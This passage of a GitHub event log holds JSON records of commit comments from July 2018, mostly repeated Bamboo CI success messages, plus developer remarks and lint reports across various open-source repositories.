test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-11T18:32:29Z"}
{"id":"7951861438","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29675212,"position":null,"line":null,"path":null,"commit_id":"86990a4896c8c515fe214f1d55e0c3675db9afbb","created_at":"2018-07-11T18:32:56Z","updated_at":"2018-07-11T18:32:56Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-dshblks2](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-dshblks2).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-dshblks2-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-11T18:32:56Z"}
{"id":"7951862149","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29675214,"position":null,"line":null,"path":null,"commit_id":"ce6ccf1e29f0ce896512a5cf4056fe06f6345589","created_at":"2018-07-11T18:33:05Z","updated_at":"2018-07-11T18:33:05Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-11T18:33:05Z"}
{"id":"7951865002","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29675222,"position":null,"line":null,"path":null,"commit_id":"e14f66d8e23120c4afd27ff771368548859a514a","created_at":"2018-07-11T18:33:41Z","updated_at":"2018-07-11T18:33:41Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-11T18:33:41Z"}
{"id":"7951865966","type":"CommitCommentEvent","actor":{"login":"sfan02"},"repo":{"name":"USEPA/EPA_Express_Code"},"payload":{"comment":{"id":29675224,"position":null,"line":null,"path":null,"commit_id":"25a9c636291d605c432de844fd74039a24724c5f","created_at":"2018-07-11T18:33:53Z","updated_at":"2018-07-11T18:33:53Z","author_association":"CONTRIBUTOR","body":"Updated tsp"}},"created_at":"2018-07-11T18:33:53Z"}
{"id":"7951867185","type":"CommitCommentEvent","actor":{"login":"NicolasGrosjean"},"repo":{"name":"ArkoG/LCDA"},"payload":{"comment":{"id":29675227,"position":52,"line":58,"path":"README.md","commit_id":"975472f41c7febb2659f3c077b2baeec0638ddba","created_at":"2018-07-11T18:34:10Z","updated_at":"2018-07-11T18:34:10Z","author_association":"COLLABORATOR","body":"Sait-on jamais si quelqu'un reprend un jour le projet ^^"}},"created_at":"2018-07-11T18:34:10Z"}
{"id":"7951867512","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29675229,"position":null,"line":null,"path":null,"commit_id":"cb518f6c517d6cb8b8f8a6e1b3b80f4e963fc0b0","created_at":"2018-07-11T18:34:13Z","updated_at":"2018-07-11T18:34:13Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-11T18:34:13Z"}
{"id":"7951870949","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29675234,"position":null,"line":null,"path":null,"commit_id":"cb518f6c517d6cb8b8f8a6e1b3b80f4e963fc0b0","created_at":"2018-07-11T18:34:54Z","updated_at":"2018-07-11T18:34:54Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-11T18:34:54Z"}
{"id":"7951873397","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29675240,"position":null,"line":null,"path":null,"commit_id":"30c2c454c36a33ca351d9f717a29210b25671bd4","created_at":"2018-07-11T18:35:23Z","updated_at":"2018-07-11T18:35:23Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-11T18:35:23Z"}
{"id":"7951875838","type":"CommitCommentEvent","actor":{"login":"cameronc137"},"repo":{"name":"JeffersonLab/remoll"},"payload":{"comment":{"id":29675244,"position":null,"line":null,"path":null,"commit_id":"99a9af7293ff90a2503b0f345af83718b63c909e","created_at":"2018-07-11T18:35:53Z","updated_at":"2018-07-11T18:35:53Z","author_association":"CONTRIBUTOR","body":"Interestingly, the two seeds per 1% of events are still printing on my local machine, but the seeds are not printed in the same version run on the ifarm."}},"created_at":"2018-07-11T18:35:53Z"}
{"id":"7951876746","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29675248,"position":null,"line":null,"path":null,"commit_id":"aa2b41023cab83e14ad9f61b13d09bde57e2cea4","created_at":"2018-07-11T18:36:06Z","updated_at":"2018-07-11T18:36:06Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-11T18:36:06Z"}
{"id":"7951879049","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29675256,"position":null,"line":null,"path":null,"commit_id":"a28f341c2ef3441af8a6b63e4e08fdb4890fc544","created_at":"2018-07-11T18:36:32Z","updated_at":"2018-07-11T18:36:32Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-11T18:36:32Z"}
{"id":"7951879606","type":"CommitCommentEvent","actor":{"login":"cletusw"},"repo":{"name":"elix/elix"},"payload":{"comment":{"id":29675258,"position":7,"line":86,"path":"src/KeyboardPrefixSelectionMixin.js","commit_id":"f661f73991a474eb612dc1aed8a3f5f0d654d5d9","created_at":"2018-07-11T18:36:39Z","updated_at":"2018-07-11T18:36:39Z","author_association":"CONTRIBUTOR","body":"This removes the need for the `resetPrefix` flag since the other branches all set it to `false`, right?"}},"created_at":"2018-07-11T18:36:39Z"}
{"id":"7951880729","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29675260,"position":null,"line":null,"path":null,"commit_id":"dc88147961e5f0c2302511d5313ce2f9429843cd","created_at":"2018-07-11T18:36:53Z","updated_at":"2018-07-11T18:36:53Z","author_association":"OWNER","body":"# Specs execution successful\r\n:scroll: [View logs](http://bamboo.comnull)\r\n### Plans updated\r\n\r\nBamboo specs have been successfully imported and the following plans have been updated.\r\n\r\nProject | Plan | Build\r\n---|---|---\r\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\r\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\r\n\r\n### Deployments updated\r\n\r\nBamboo specs have been successfully imported and the following deployment projects have been updated.\r\n\r\n|Deployment project |\r\n----|\r\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\r\n"}},"created_at":"2018-07-11T18:36:53Z"}
{"id":"7951881311","type":"CommitCommentEvent","actor":{"login":"wdconinc"},"repo":{"name":"JeffersonLab/remoll"},"payload":{"comment":{"id":29675261,"position":null,"line":null,"path":null,"commit_id":"99a9af7293ff90a2503b0f345af83718b63c909e","created_at":"2018-07-11T18:37:00Z","updated_at":"2018-07-11T18:37:00Z","author_association":"MEMBER","body":"I changed that to 10% of events. That way any errors don't just scroll of the screen. Change with /remoll/interval."}},"created_at":"2018-07-11T18:37:00Z"}
{"id":"7951881457","type":"CommitCommentEvent","actor":{"login":"hmh"},"repo":{"name":"platomav/CPUMicrocodes"},"payload":{"comment":{"id":29675262,"position":null,"line":null,"path":null,"commit_id":"e57dee324fd819ac4907d3855b38d1a74dad4ff5","created_at":"2018-07-11T18:37:02Z","updated_at":"2018-07-11T18:37:02Z","author_association":"NONE","body":"Well, FWIW, Intel only \"officially released for production\" the microcode update for 0x106A5 5500-series Xeon (platform id mask 0x01), _Gainestown_. Bloomfield desktop cores (platform id mask 0x02) are not \"officially blessed\" to use the new microcode.  I am not sure about the Xeon 3500 series, but it looks like they're not officially blessed to run that new microcode, either.\r\n\r\nDoesn't mean it won't work. YMMV.  But at least try it using an OS-based update first if you're going to flash it into firmware..."}},"created_at":"2018-07-11T18:37:02Z"}
{"id":"7951882641","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29675265,"position":null,"line":null,"path":null,"commit_id":"15183b39c052da06bfd6ecae742e832f520324a5","created_at":"2018-07-11T18:37:16Z","updated_at":"2018-07-11T18:37:16Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-11T18:37:16Z"}
{"id":"7951884776","type":"CommitCommentEvent","actor":{"login":"n-t-roff"},"repo":{"name":"n-t-roff/heirloom-doctools"},"payload":{"comment":{"id":29675268,"position":null,"line":null,"path":null,"commit_id":"fd2816bbce0e5f8830e5c977cdaf8d322d84db10","created_at":"2018-07-11T18:37:41Z","updated_at":"2018-07-11T18:37:41Z","author_association":"OWNER","body":"I tried a merge....\r\nIt does compile for me and old functionality seems to work.\r\n@reffort is there some of the new functionality in `n-t-roff`?\r\n@ others: Does old functionality still work?"}},"created_at":"2018-07-11T18:37:41Z"}
{"id":"7951884934","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29675269,"position":null,"line":null,"path":null,"commit_id":"a1cf4e7574f66e1880f4bec488770e5547413197","created_at":"2018-07-11T18:37:43Z","updated_at":"2018-07-11T18:37:43Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-11T18:37:43Z"}
{"id":"7951888328","type":"CommitCommentEvent","actor":{"login":"gitmate-bot"},"repo":{"name":"coala/coala"},"payload":{"comment":{"id":29675275,"position":null,"line":null,"path":null,"commit_id":"354c5ccfacaf096ec44e996c13c7eece237978fd","created_at":"2018-07-11T18:38:22Z","updated_at":"2018-07-11T18:38:22Z","author_association":"COLLABORATOR","body":"Comment on 354c5ccfacaf096ec44e996c13c7eece237978fd.\n\nThere are 15 results for the section autopep8. They have been shortened and will not be shown inline because they are more than 10.\n\n| Message | File | Line |\n|---|---|---|\n| The code does not comply to PEP8. | tests/results/result_actions/ShowAppliedPatchesActionTest.py | 47 |\n| E122 continuation line missing indentation or outdented | tests/results/result_actions/ShowAppliedPatchesActionTest.py | 47 |\n| E122 continuation line missing indentation or outdented | tests/results/result_actions/ShowAppliedPatchesActionTest.py | 48 |\n| E122 continuation line missing indentation or outdented | tests/results/result_actions/ShowAppliedPatchesActionTest.py | 49 |\n| The code does not comply to PEP8. | tests/processes/ProcessingTest.py | 86 |\n| E501 line too long (84 > 80 characters) | tests/processes/ProcessingTest.py | 86 |\n| E501 line too long (82 > 80 characters) | tests/processes/ProcessingTest.py | 87 |\n| E231 missing whitespace after ',' | tests/processes/ProcessingTest.py | 88 |\n| E501 line too long (81 > 80 characters) | tests/processes/ProcessingTest.py | 88 |\n| E501 line too long (82 > 80 characters) | tests/processes/ProcessingTest.py | 89 |\n| E501 line too long (82 > 80 characters) | tests/processes/ProcessingTest.py | 90 |\n| E501 line too long (82 > 80 characters) | tests/processes/ProcessingTest.py | 91 |\n| E501 line too long (82 > 80 characters) | tests/processes/ProcessingTest.py | 92 |\n| E501 line too long (85 > 80 characters) | tests/processes/ProcessingTest.py | 93 |\n| E501 line too long (82 > 80 characters) | tests/processes/ProcessingTest.py | 94 |\n\nUntil GitMate provides an online UI to show a better overview, you can run [coala](https://coala.io/) locally for more details."}},"created_at":"2018-07-11T18:38:22Z"}
{"id":"7951888740","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29675277,"position":null,"line":null,"path":null,"commit_id":"cb518f6c517d6cb8b8f8a6e1b3b80f4e963fc0b0","created_at":"2018-07-11T18:38:27Z","updated_at":"2018-07-11T18:38:27Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-11T18:38:27Z"}
{"id":"7951890765","type":"CommitCommentEvent","actor":{"login":"larsbrinkhoff"},"repo":{"name":"PDP-10/its"},"payload":{"comment":{"id":29675279,"position":null,"line":null,"path":null,"commit_id":"58a9467a714cbfe9c220a98d1cd59982645394eb","created_at":"2018-07-11T18:38:49Z","updated_at":"2018-07-11T18:38:49Z","author_association":"MEMBER","body":"Ok!"}},"created_at":"2018-07-11T18:38:49Z"}
{"id":"7951890964","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29675280,"position":null,"line":null,"path":null,"commit_id":"9ff879811f4c95e4ebf9b965c64288f1d8c62639","created_at":"2018-07-11T18:38:51Z","updated_at":"2018-07-11T18:38:51Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-11T18:38:51Z"}
{"id":"7951894939","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29675286,"position":null,"line":null,"path":null,"commit_id":"ce6ccf1e29f0ce896512a5cf4056fe06f6345589","created_at":"2018-07-11T18:39:38Z","updated_at":"2018-07-11T18:39:38Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-11T18:39:38Z"}
{"id":"7951895273","type":"CommitCommentEvent","actor":{"login":"p51i"},"repo":{"name":"UI-Research/next50"},"payload":{"comment":{"id":29675289,"position":null,"line":null,"path":null,"commit_id":"b0edd55ae19d2ae6f466096eeba42ba036395aa5","created_at":"2018-07-11T18:39:42Z","updated_at":"2018-07-11T18:39:42Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [next50#ci-2](https://dashboard.pantheon.io/sites/8e7c33cd-c6bd-4dcf-a71d-f1ade4f2e791#ci-2).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-2-next50.pantheonsite.io/)"}},"created_at":"2018-07-11T18:39:42Z"}
{"id":"7951896999","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29675291,"position":null,"line":null,"path":null,"commit_id":"46f14abc96336851feee32a7fc631c00ae8ef2ff","created_at":"2018-07-11T18:40:02Z","updated_at":"2018-07-11T18:40:02Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-11T18:40:02Z"}
{"id":"7951897311","type":"CommitCommentEvent","actor":{"login":"furqanbaqai"},"repo":{"name":"furqanbaqai/Remittance"},"payload":{"comment":{"id":29675292,"position":73,"line":44,"path":"contracts/Remittance.sol","commit_id":"f69b6002b1f9a8c0f24438f35653af1f070a0659","created_at":"2018-07-11T18:40:06Z","updated_at":"2018-07-11T18:40:06Z","author_association":"OWNER","body":"Understood. Can I do it out of the contract then ? LIke AES128(password) ?"}},"created_at":"2018-07-11T18:40:06Z"}
{"id":"7951901067","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29675301,"position":null,"line":null,"path":null,"commit_id":"ce6ccf1e29f0ce896512a5cf4056fe06f6345589","created_at":"2018-07-11T18:40:50Z","updated_at":"2018-07-11T18:40:50Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-11T18:40:50Z"}
{"id":"7951901291","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29675303,"position":null,"line":null,"path":null,"commit_id":"8a6a92031d3bf7bc8d71b0fb7dbca764abc49fdb","created_at":"2018-07-11T18:40:53Z","updated_at":"2018-07-11T18:40:53Z","author_association":"OWNER","body":"# Specs execution successful\r\n:scroll: [View logs](http://bamboo.comnull)\r\n### Plans updated\r\n\r\nBamboo specs have been successfully imported and the following plans have been updated.\r\n\r\nProject | Plan | Build\r\n---|---|---\r\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\r\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\r\n\r\n### Deployments updated\r\n\r\nBamboo specs have been successfully imported and the following deployment projects have been updated.\r\n\r\n|Deployment project |\r\n----|\r\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\r\n"}},"created_at":"2018-07-11T18:40:53Z"}
{"id":"7951901530","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29675304,"position":null,"line":null,"path":null,"commit_id":"d846bee7b995a60038d1ab284be4b15525c7a5fa","created_at":"2018-07-11T18:40:55Z","updated_at":"2018-07-11T18:40:55Z","author_association":"OWNER","body":"# Specs execution successful\r\n:scroll: [View logs](http://bamboo.comnull)\r\n### Plans updated\r\n\r\nBamboo specs have been successfully imported and the following plans have been updated.\r\n\r\nProject | Plan | Build\r\n---|---|---\r\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\r\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\r\n\r\n### Deployments updated\r\n\r\nBamboo specs have been successfully imported and the following deployment projects have been updated.\r\n\r\n|Deployment project |\r\n----|\r\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\r\n"}},"created_at":"2018-07-11T18:40:55Z"}
{"id":"7951902601","type":"CommitCommentEvent","actor":{"login":"X3msnake"},"repo":{"name":"Photonsters/anycubic-photon-docs"},"payload":{"comment":{"id":29675306,"position":null,"line":null,"path":null,"commit_id":"2e36564afa6eebd71115846305e9057965f80d76","created_at":"2018-07-11T18:41:08Z","updated_at":"2018-07-11T18:41:08Z","author_association":"CONTRIBUTOR","body":"Awsome work you are doing here Master @webbyeasy \r\n\r\nHere's some good problem reviews to catalog.\r\n\r\nDon't forget to add the due credit to the photonsters that found things, maybe a footnote reference\r\n\r\nReference posts:\r\nWooble - Eddie Bianco\r\nhttps://www.facebook.com/groups/AnycubicPhoton/permalink/1382886828522622/\r\n\r\nBent Z Flange - Chris Campbell\r\nhttps://www.facebook.com/groups/AnycubicPhoton/permalink/1331663986978240/\r\n\r\n\r\n\r\n"}},"created_at":"2018-07-11T18:41:08Z"}
